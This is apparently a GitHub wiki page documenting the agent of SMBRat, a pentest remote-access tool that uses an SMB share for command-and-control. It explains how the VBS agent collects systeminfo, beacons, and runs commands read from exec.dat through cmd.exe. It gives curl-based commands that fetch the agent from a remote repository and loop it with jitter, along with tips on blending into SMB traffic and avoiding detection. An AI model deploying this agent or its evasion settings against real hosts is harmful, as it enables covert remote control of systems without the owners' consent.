-
Notifications
You must be signed in to change notification settings - Fork 13
Agent
The Agent is a Visual Basic Script that runs on the infected host.
The Script connects to an SMB Share that is Served by the Handler.
It actually doesn't issue a net use command, but just uses the UNC Path of the Share (\\hostname\ShareName\<files>) for every file operation. This is to avoid mounting the remote Share to a Drive Letter (like net use Z: \\hostname\ShareName\ would do).
You have to change the top 3 lines of the VBS Agent to match your setup:
ServerName = "\\172.16.47.191" <-- Whatever you do - keep the "\\"
ShareName = "D$" <-- Make it easy to blend in the rest of SMB traffic
ProjectName = "projectName" <-- Arbitrary name for the Pentest you are working onThe script does execute in a linear fashion and exits (there is no loop in place). It runs through a routine that is roughly explained below:
Let <hostname>-<username>-<prim_MAC> be folderName
-
Is there a directory with name
ProjectNamein the Share (ServerName\ShareName)?- NO -> Create it
-
Is there a directory with name
folderNamein theProjectNamedirectory?- NO -> Create it
-
Is there a file at
ServerName\ShareName\ProjectName\folderName\ namedcheckin.dat?-
NO -> Create it and write the output of
time /tanddate /tin there.
-
NO -> Create it and write the output of
-
Is there a file at
ServerName\ShareName\projectName\folderName\namedinfo.dat?-
NO -> Create it and write the output of
systeminfoin there.
-
NO -> Create it and write the output of
-
Write Zero bytes to the file
ServerName\ShareName\ProjectName\folderName\ping.dat- To change the modification time of the file
-
Is there a file at
ServerName\ShareName\ProjectName\folderName\ namedexec.dat?- NO -> Exit
-
Read the
ServerName\ShareName\ProjectName\folderName\exec.datand execute the text contents (not the file) withcmd.exe /c <contents> -
Write the Command's output in
ServerName\ShareName\ProjectName\folderName\output.dat -
Exit
To create a fresh Agent which executes every second with bash run the following:
DELAY=1000
echo "Do While True" > agent.vbs
curl "https://raw.githubusercontent.com/operatorequals/SMBRat/master/agent.vbs" >> agent.vbs
echo " WScript.Sleep $DELAY" >> agent.vbs
echo "Loop" >> agent.vbsThe $DELAY is in milliseconds.
If you would like some JITTER Percentage to go with that (Cobalt Strike sleep 10 20 style):
DELAY=10000 # A 10 second sleep (in milliseconds)
JITTER=20 # A 20% Jitter on the 10 seconds (sleeping randomly between 8 and 12 seconds)
echo "JitMillis = $DELAY * $JITTER * 0.01" > agent.vbs
echo "Do While True" >> agent.vbs
curl "https://raw.githubusercontent.com/operatorequals/SMBRat/master/agent.vbs" >> agent.vbs
echo "randomize" >> agent.vbs
echo " WScript.Sleep $DELAY+Int((JitMillis+JitMillis+1)*Rnd-JitMillis)" >> agent.vbs
echo "Loop" >> agent.vbsDoing maths in VBS is a pain, so I did for you
An 7 second DELAY with a 3 second JITTER is quite undetectable while still responsive...